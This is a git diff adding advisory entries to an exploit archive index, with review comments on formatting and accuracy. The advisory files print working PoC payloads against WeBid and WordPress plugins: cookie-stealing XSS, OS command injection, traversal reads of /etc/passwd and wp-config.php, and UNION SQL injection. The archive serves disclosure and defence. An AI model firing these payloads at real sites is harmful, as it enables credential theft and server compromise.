diff --git a/files.csv b/files.csv
index b5095e169..d835a1e5a 100755
--- a/files.csv
+++ b/files.csv
@@ -33712,6 +33712,7 @@ id,file,description,date,author,platform,type,port
 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
+39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
 37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
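Review bot: The new 39249 row is spliced into the 373xx block at line 33713 while the other five new rows (39250–39254) are appended after 39248 in the second hunk, so one batch of additions lands in two unrelated places and is harder to audit; moving `+39249,platforms/php/webapps/39249.txt,...` to follow the 39248 row would keep the batch together. The `port` column is also worth a look in both hunks: every new row carries 0, while the adjacent webapp entries 39245 and 39246 in the second hunk carry 80 — if 80 is the convention for HTTP-reachable advisories, these should be made consistent, otherwise the mixed values are misleading to consumers of the index.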
@@ -35494,3 +35495,8 @@ id,file,description,date,author,platform,type,port
 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
 39248,platforms/php/webapps/39248.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
+39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin Cross Site Scripting and Command Injection Vulnerabilities",2014-07-13,MustLive,php,webapps,0
+39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Include Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
diff --git a/platforms/php/webapps/39249.txt b/platforms/php/webapps/39249.txt
new file mode 100755
index 000000000..c47fa70ea
--- /dev/null
+++ b/platforms/php/webapps/39249.txt
@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/68519/info
+
+WeBid is prone to multiple cross-site-scripting vulnerabilities and an LDAP injection vulnerability.
+
+An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+WeBid 1.1.1 is vulnerable; other versions may also be affected.
+
+1. http://www.example.com/WeBid/register.php
+
+Reflected Cross-Site Scripting in the parameters are :
+ "TPL_name="
+ "TPL_nick="
+ "TPL_email"
+ "TPL_year"
+ "TPL_address"
+ "TPL_city"
+ "TPL_prov"
+ "TPL_zip"
+ "TPL_phone"
+ "TPL_pp_email"
+ "TPL_authnet_id"
+ "TPL_authnet_pass"
+ "TPL_wordpay_id"
+ "TPL_toocheckout_id"
+ "TPL_moneybookers_email"
+
+PoC :
+we can run our xss script with all these different parameters
+
+Host=www.example.com
+User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language=en-US,en;q=0.5
+Accept-Encoding=gzip, deflate
+Referer=http://www.example.com/web-id/register.php
+Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
+Connection=keep-alive
+Content-Type=application/x-www-form-urlencoded
+Content-Length=417
+POSTDATA=csrftoken=&TPL_name=">&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
+----------------------------------------------------------------------------------------------------------------
+2. http://www.example.com/WeBid/user_login.php
+
+Reflected Cross-Site Scripting in the parameter is :
+ "username"
+
+Host=www.example.com
+User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language=en-US,en;q=0.5
+Accept-Encoding=gzip, deflate
+Referer=http://www.example.com/web-id/user_login.php
+Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
+Connection=keep-alive
+Content-Type=application/x-www-form-urlencoded
+Content-Length=96
+POSTDATA=username=">&password=&input=Login&action=login
+==================================================================================================================
+2. LDAP Injection
+
+PoC :
+http://www.example.com/WeBid/loader.php?js=[LDAP]
+http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;
+
+PoC
+http://www.example.com/WeBid/viewhelp.php?cat=[LDAP]
+Replace cat= as 1,2,3,4
diff --git a/platforms/php/webapps/39250.txt b/platforms/php/webapps/39250.txt
new file mode 100755
index 000000000..a00705321
--- /dev/null
+++ b/platforms/php/webapps/39250.txt
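Review bot: The section numbering in the new advisory is inconsistent — both the user_login.php section and the LDAP Injection section are labelled `2.`, so the latter should read `3. LDAP Injection`. The parameter list also names `"TPL_wordpay_id"` while the captured POST body uses `TPL_worldpay_id`; one of the two is a typo, and a triager grepping the application for the listed name will miss the field. The "LDAP Injection" classification is not supported by what is shown: `loader.php?js=` takes a semicolon-separated list of script paths and `viewhelp.php?cat=` takes small integers, which reads as unvalidated path/identifier handling rather than an LDAP query, so the class should be hedged or verified before the CSV title is taken at face value. Finally, the request captures carry the researcher's `WEBID_ONLINE` and `PHPSESSID` cookie values, which add nothing to the PoC and are normally redacted.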
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/68525/info
+
+WordPress DZS-VideoGallery plugin is prone to multiple cross site scripting vulnerabilities and a command-injection vulnerability.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to execute arbitrary OS commands. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+DZS-VideoGallery 7.85 is vulnerable; prior versions are also affected.
+
+Cross-site-scripting:
+
+http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+Command-Injection:
+
+http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd)
\ No newline at end of file
diff --git a/platforms/php/webapps/39251.txt b/platforms/php/webapps/39251.txt
new file mode 100755
index 000000000..6ad2684d9
--- /dev/null
+++ b/platforms/php/webapps/39251.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/68556/info
+
+BookX plugin for WordPress is prone to a local file-include vulnerability because it fails to adequately validate user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information; other attacks are also possible.
+
+BookX plugin 1.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../../../../../etc/passwd
+
+http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/39252.txt b/platforms/php/webapps/39252.txt
new file mode 100755
index 000000000..bfaf7f3c9
--- /dev/null
+++ b/platforms/php/webapps/39252.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68557/info
+
+WP Rss Poster plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WP Rss Poster 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18
\ No newline at end of file
diff --git a/platforms/php/webapps/39253.txt b/platforms/php/webapps/39253.txt
new file mode 100755
index 000000000..b0384df3f
--- /dev/null
+++ b/platforms/php/webapps/39253.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68558/info
+
+ENL Newsletter plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ENL Newsletter 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1
\ No newline at end of file
diff --git a/platforms/php/webapps/39254.html b/platforms/php/webapps/39254.html
new file mode 100755
index 000000000..29ba82202
--- /dev/null
+++ b/platforms/php/webapps/39254.html
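Review bot: Neither 39252.txt nor 39253.txt states the privilege level needed to reach the injection point, yet both PoCs go through `wp-admin/admin.php?page=...`, which normally sits behind an authenticated WordPress session and, presumably, a capability check on the plugin's admin page; without that statement, severity triage over-estimates the exposure. A line after the version statement such as `Requires an authenticated user who can open the plugin's admin page (verify which capability the plugin checks)` would fix this in both files. The advisories also only show that the `id` parameter is injected and do not name the plugin handler that builds the query, so a defender cannot confirm whether a given release is patched; if the location is known it should be cited.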
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/68656/info
+
+The CopySafe PDF Protection plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+CopySafe PDF Protection 0.6 and prior are vulnerable.
+
+